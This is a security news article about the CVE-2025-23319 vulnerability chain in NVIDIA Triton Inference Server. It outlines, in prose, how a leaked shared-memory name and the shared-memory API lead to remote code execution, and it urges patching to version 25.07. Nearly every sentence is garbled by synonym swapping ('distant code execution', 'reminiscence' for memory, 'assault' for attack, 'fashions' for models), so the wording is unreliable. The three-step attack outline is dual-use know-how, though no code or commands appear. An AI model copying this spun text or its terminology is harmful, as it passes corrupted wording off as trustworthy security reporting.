A important vulnerability chain in NVIDIA’s Triton Inference Server that permits unauthenticated attackers to realize full distant code execution (RCE) and acquire full management over AI servers.
The vulnerability chain, recognized as CVE-2025-23319, CVE-2025-23320, and CVE-2025-23334, exploits the server’s Python backend via a classy three-step assault course of involving shared reminiscence manipulation.
Key Takeaways1. CVE-2025-23319 chain permits attackers to take over NVIDIA Triton AI servers totally.2. Exploits error messages to leak reminiscence names, then abuses the shared reminiscence API for distant code execution.3. Replace instantly – impacts widely-used AI deployment infrastructure.
Vulnerability Chain Targets NVIDIA Triton Inference Server
The vulnerability chain targets NVIDIA Triton Inference Server, a widely-deployed open-source platform used for working AI fashions at scale throughout enterprises.
Wiz Analysis responsibly disclosed the findings to NVIDIA with patches launched on August 4, 2025.
The assault begins with a minor info leak however escalates to finish system compromise, posing important dangers together with theft of proprietary AI fashions, publicity of delicate information, manipulation of AI mannequin responses, and offering attackers with community pivot factors.
The vulnerability particularly impacts the Python backend, probably the most fashionable and versatile backends within the Triton ecosystem.
This backend not solely serves Python-written fashions but in addition acts as a dependency for different backends, considerably increasing the potential assault floor.
Organizations utilizing Triton for AI/ML operations face rapid threats to their mental property and operational safety.
The assault chain employs a classy Inter-Course of Communication (IPC) exploitation technique via shared reminiscence areas positioned at /dev/shm/.
Step 1 entails triggering an info disclosure vulnerability via crafted giant requests that trigger exceptions, revealing the backend’s inner shared reminiscence identify in error messages like “Failed to extend the shared reminiscence pool measurement for key ‘triton_python_backend_shm_region_4f50c226-b3d0-46e8-ac59-d4690b28b859′”.
Step 2 exploits Triton’s user-facing shared reminiscence API, which lacks correct validation to differentiate between reliable user-owned areas and personal inner ones.
Attackers can register the leaked inner shared reminiscence key via the registration endpoint, gaining learn/write primitives into the Python backend’s non-public reminiscence containing important information constructions and management mechanisms.
NVIDIA Triton Vulnerability Chain
Step 3 leverages this reminiscence entry to deprave current information constructions, manipulate pointers like MemoryShm and SendMessageBase for out-of-bounds reminiscence entry, and craft malicious IPC messages to realize distant code execution.
NVIDIA has launched patches in Triton Inference Server model 25.07, and organizations should replace instantly.
The vulnerability impacts each the primary server and Python backend parts, requiring complete updates throughout all deployments.
Wiz clients can make the most of specialised detection queries via the Vulnerability Findings web page and Safety Graph to establish weak cases, together with publicly uncovered VMs, serverless capabilities, and containers.
Combine ANY.RUN TI Lookup together with your SIEM or SOAR To Analyses Superior Threats -> Attempt 50 Free Trial Searches